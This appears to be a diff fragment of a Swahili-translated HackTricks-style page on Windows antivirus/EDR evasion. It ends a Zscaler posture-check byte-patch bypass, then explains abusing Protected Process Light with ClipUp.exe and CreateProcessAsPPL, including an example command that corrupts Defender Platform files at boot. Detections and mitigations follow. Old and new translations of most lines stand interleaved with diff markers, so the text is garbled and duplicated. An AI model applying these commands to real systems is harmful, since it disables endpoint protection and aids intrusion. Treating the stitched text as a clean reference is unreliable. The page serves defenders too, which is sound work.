Minimal patcher excerpt:
```python
@ -761,22 +796,22 @@ else:
f.seek(off)
f.write(replacement)
```
Baada ya kubadilisha faili za awali na kuanzisha upya msururu wa huduma:
Baada ya kubadilisha faili za asili na kuwasha upya service stack:
* **All** posture checks display **green/compliant**.
* Binaries zisizotiwa saini au zilizorekebishwa zinaweza kufungua named-pipe RPC endpoints (kwa mfano `\\RPC Control\\ZSATrayManager_talk_to_me`).
* Mshini uliodukuliwa unapata ufikiaji bila vikwazo wa mtandao wa ndani uliofafanuliwa na sera za Zscaler.
* **Kila** ukaguzi wa postura unaonyesha **kijani/zinakubaliana**.
* Binaries zisizotiwa saini au zilizorekebishwa zinaweza kufungua miisho ya RPC ya named-pipe (e.g. `\\RPC Control\\ZSATrayManager_talk_to_me`).
* Mashine iliyodukuliwa hupata ufikiaji usiozuiliwa kwa mtandao wa ndani ulioainishwa na sera za Zscaler.
Utafiti huu wa kesi unaonyesha jinsi maamuzi ya kuaminiana upande wa mteja na ukaguzi rahisi wa saini yanavyoweza kushindwa kwa patch ndogo za byte.
Uchunguzi huu wa kesi unaonyesha jinsi maamuzi ya uaminifu yanayofanywa upande wa mteja na ukaguzi rahisi wa saini yanaweza kushindwa kwa byte patches chache.
## Kutumia vibaya Protected Process Light (PPL) To Tamper AV/EDR With LOLBINs
Protected Process Light (PPL) inatekeleza hierarchy ya signer/level ili tu michakato iliyolindwa yenye kiwango sawa au cha juu iweze kuhujumiwa miongoni mwao. Kwa upande wa shambulizi, ikiwa unaweza kuanzisha kwa halali binary iliyo na PPL na kudhibiti arguments zake, unaweza kubadilisha utendakazi usio hatari (kwa mfano, logging) kuwa primitive ya kuandika iliyodhibitiwa, inayoungwa mkono na PPL dhidi ya saraka zilizolindwa zinazotumika na AV/EDR.
Protected Process Light (PPL) inatekeleza hierarkia ya mtoa saini/kiwango ili tu michakato iliyolindwa yenye kiwango sawa au cha juu iweze kuathiri kila mmoja. Kwa upande wa shambulio, ikiwa unaweza kuzindua kisheria binary iliyojengwa kwa PPL na kudhibiti hoja zake, unaweza kubadilisha utendaji salama (mfano, logging) kuwa primitive ya kuandika inayodhibitiwa, inayotegemewa na PPL dhidi ya saraka zilizolindwa zinazotumika na AV/EDR.
What makes a process run as PPL
- The target EXE (and any loaded DLLs) must be signed with a PPL-capable EKU.
- The process must be created with CreateProcess using the flags: `EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS`.
- A compatible protection level must be requested that matches the signer of the binary (e.g., `PROTECTION_LEVEL_ANTIMALWARE_LIGHT` for anti-malware signers, `PROTECTION_LEVEL_WINDOWS` for Windows signers). Wrong levels will fail at creation.
Nini kinachofanya mchakato uendeshwe kama PPL
- EXE lengwa (na DLL yoyote iliyopakiwa) lazima itwe saini na EKU inayofaa kwa PPL.
- Mchakato lazima uundwe kwa CreateProcess ukitumia flag: `EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS`.
- Lazima uombewe kiwango cha ulinzi kinachofanana na mtoa saini wa binary (mfano, `PROTECTION_LEVEL_ANTIMALWARE_LIGHT` kwa mtoa saini wa anti-malware, `PROTECTION_LEVEL_WINDOWS` kwa mtoa saini wa Windows). Viwango visivyofaa vitaanguka wakati wa uundaji.
See also a broader intro to PP/PPL and LSASS protection here:
@ -785,9 +820,9 @@ stealing-credentials/credentials-protections.md
{{#endref}}
Launcher tooling
- Msaidizi wa chanzo wazi: CreateProcessAsPPL (huchagua protection level na hupitisha arguments kwa EXE lengwa):
- Open-source helper: CreateProcessAsPPL (huchagua kiwango cha ulinzi na hupitisha hoja kwa EXE lengwa):
- [https://github.com/2x7EQ13/CreateProcessAsPPL](https://github.com/2x7EQ13/CreateProcessAsPPL)
- Usage pattern:
- Mfano wa matumizi:
```text
CreateProcessAsPPL.exe <level 0..4> <path-to-ppl-capable-exe> [args...]
# example: spawn a Windows-signed component at PPL level 1 (Windows)
@ -796,41 +831,41 @@ CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe <args>
CreateProcessAsPPL.exe 3 <anti-malware-signed-exe> <args>
```
LOLBIN primitive: ClipUp.exe
- Binary ya mfumo iliyosainiwa `C:\Windows\System32\ClipUp.exe` inajizalisha yenyewe na inakubali parameter ya kuandika faili ya log kwenye njia iliyotajwa na mtumiaji.
- Iwapo itaendeshwa kama mchakato wa PPL, uandishi wa faili hufanyika kwa msaada wa PPL.
- ClipUp haiwezi kuchanganua njia zenye nafasi; tumia njia fupi za 8.3 kuonyesha maeneo ambayo kawaida yanalindwa.
- The signed system binary `C:\Windows\System32\ClipUp.exe` self-spawns and accepts a parameter to write a log file to a caller-specified path.
- When launched as a PPL process, the file write occurs with PPL backing.
- ClipUp cannot parse paths containing spaces; use 8.3 short paths to point into normally protected locations.
8.3 short path helpers
- Orodhesha majina mafupi: `dir /x` katika kila saraka mzazi.
- Pata njia fupi katika cmd: `for %A in ("C:\ProgramData\Microsoft\Windows Defender\Platform") do @echo %~sA`
- List short names: `dir /x` in each parent directory.
- Derive short path in cmd: `for %A in ("C:\ProgramData\Microsoft\Windows Defender\Platform") do @echo %~sA`
Abuse chain (abstract)
1) Anzisha LOLBIN inayoweza PPL (ClipUp) kwa `CREATE_PROTECTED_PROCESS` ukitumia launcher (kwa mfano CreateProcessAsPPL).
2) Pitisha hoja ya log-path ya ClipUp ili kulazimisha uundaji wa faili katika saraka ya AV inayolindwa (kwa mfano, Defender Platform). Tumia majina mafupi ya 8.3 ikiwa inahitajika.
3) Ikiwa binary lengwa kwa kawaida iko wazi/imefungwa na AV wakati inapoendesha (kwa mfano, MsMpEng.exe), panga uandishi wakati wa boot kabla AV haijaanza kwa kusanidi service ya kuanzisha kiotomatiki ambayo inafanya kazi mapema kwa uhakika. Thibitisha mpangilio wa boot kwa kutumia Process Monitor (boot logging).
4) Baada ya reboot uandishi unaoungwa mkono na PPL hutokea kabla AV haijafunga binaries zake, ukaharibu faili lengwa na kuzuia startup.
1) Launch the PPL-capable LOLBIN (ClipUp) with `CREATE_PROTECTED_PROCESS` using a launcher (e.g., CreateProcessAsPPL).
2) Pass the ClipUp log-path argument to force a file creation in a protected AV directory (e.g., Defender Platform). Use 8.3 short names if needed.
3) If the target binary is normally open/locked by the AV while running (e.g., MsMpEng.exe), schedule the write at boot before the AV starts by installing an auto-start service that reliably runs earlier. Validate boot ordering with Process Monitor (boot logging).
4) On reboot the PPL-backed write happens before the AV locks its binaries, corrupting the target file and preventing startup.
Mfano wa kuitisha (njia zimefichwa/zimefupishwa kwa usalama):
Example invocation (paths redacted/shortened for safety):
```text
# Run ClipUp as PPL at Windows signer level (1) and point its log to a protected folder using 8.3 names
CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe -ppl C:\PROGRA~3\MICROS~1\WINDOW~1\Platform\<ver>\samplew.dll
```
Notes and constraints
- Huwezi kudhibiti yaliyomo ambayo ClipUp inaandika zaidi ya mahali; primitive hii inafaa kwa uharibifu badala ya uingizaji sahihi la yaliyomo.
- Inahitaji local admin/SYSTEM ili kusanidi/kuanza service na dirisha la kuwasha upya.
- Muda ni muhimu: lengo halipaswi kuwa wazi; utekelezaji wakati wa boot huzuia kufungwa kwa faili.
Vidokezo na vikwazo
- Huwezi kudhibiti yaliyomo ambayo ClipUp huandika zaidi ya mpangilio; primitive hii inafaa zaidi kwa uharibifu badala ya kuingiza yaliyomo kwa umakini.
- Inahitaji local admin/SYSTEM kusanidi kuanzisha service na dirisha la kuanzisha upya.
- Muda ni muhimu: lengo halipaswi kuwa wazi; utekelezaji wakati wa boot unazuia locks za faili.
Detections
- Uundaji wa mchakato wa `ClipUp.exe` na hoja zisizo za kawaida, hasa ukiwa umewekwa chini ya launchers zisizo za kawaida, karibu na boot.
- Services mpya zilizosanidiwa kuanza moja kwa moja binaries zenye kuhatarisha na kuanza kwa urahisi kabla ya Defender/AV. Chunguza uundaji/urekebishaji wa service kabla ya kushindwa kwa startup kwa Defender.
- Ufuatiliaji wa uadilifu wa faili kwenye Defender binaries/Platform directories; uundaji/urekebishaji wa faili usiotarajiwa na michakato yenye protected-process flags.
- ETW/EDR telemetry: tafuta michakato iliyoundwa na `CREATE_PROTECTED_PROCESS` na matumizi yasiyo ya kawaida ya ngazi za PPL na binaries ambazo si-AV.
Utambuzi
- Uundaji wa mchakato wa `ClipUp.exe` na hoja zisizo za kawaida, hasa ukiwa umezaliwa na non-standard launchers, karibu na boot.
- New services zilizosetishwa kuanzisha moja kwa moja suspicious binaries na kuanza mara kwa mara kabla ya Defender/AV. Chunguza uundaji/urekebishaji wa service kabla ya kushindwa kuanza kwa Defender.
- File integrity monitoring kwenye Defender binaries/Platform directories; uundaji/urekebishaji wa faili zisizotarajiwa na michakato yenye protected-process flags.
- ETW/EDR telemetry: tazama michakato iliyoundwa kwa `CREATE_PROTECTED_PROCESS` na matumizi isiyo ya kawaida ya viwango vya PPL na non-AV binaries.
Mitigations
- WDAC/Code Integrity: zuia ni binaries zipi zilizosainiwa zinaweza kukimbia kama PPL na chini ya wazazi gani; zuia mwito wa ClipUp nje ya muktadha halali.
- Service hygiene: zuia uundaji/urekebishaji wa services za auto-start na fuatilia uchezaji wa mpangilio wa kuanza.
- Hakikisha Defender tamper protection na early-launch protections zimeshashawaka; chunguza makosa ya startup yanayoonyesha uharibifu wa binary.
- Fikiria kuzima 8.3 short-name generation kwenye volumes zinazoendesha zana za usalama ikiwa inafaa kwa mazingira yako (jaribu kwa kina).
Kupunguza hatari
- WDAC/Code Integrity: zuia ni signed binaries zipi zinaweza kukimbia kama PPL na chini ya wazazi gani; zuii ClipUp invocation nje ya muktadha halali.
- Service hygiene: zuia uundaji/urekebishaji wa auto-start services na fuatilia start-order manipulation.
- Hakikisha Defender tamper protection na early-launch protections zimeshawashwa; chunguza makosa ya kuanzisha yanayoashiria binary corruption.
- Fikiria kuzima 8.3 short-name generation kwenye volumes zinazohifadhi security tooling ikiwa inafaa kwa mazingira yako (jaribu kwa kina).
References for PPL and tooling
- Microsoft Protected Processes overview: https://learn.microsoft.com/windows/win32/procthread/protected-processes
@ -853,4 +888,6 @@ References for PPL and tooling
- [CreateProcessAsPPL launcher](https://github.com/2x7EQ13/CreateProcessAsPPL)
- [Zero Salarium Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html)
- [Check Point Research Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
{{#include ../banners/hacktricks-training.md}}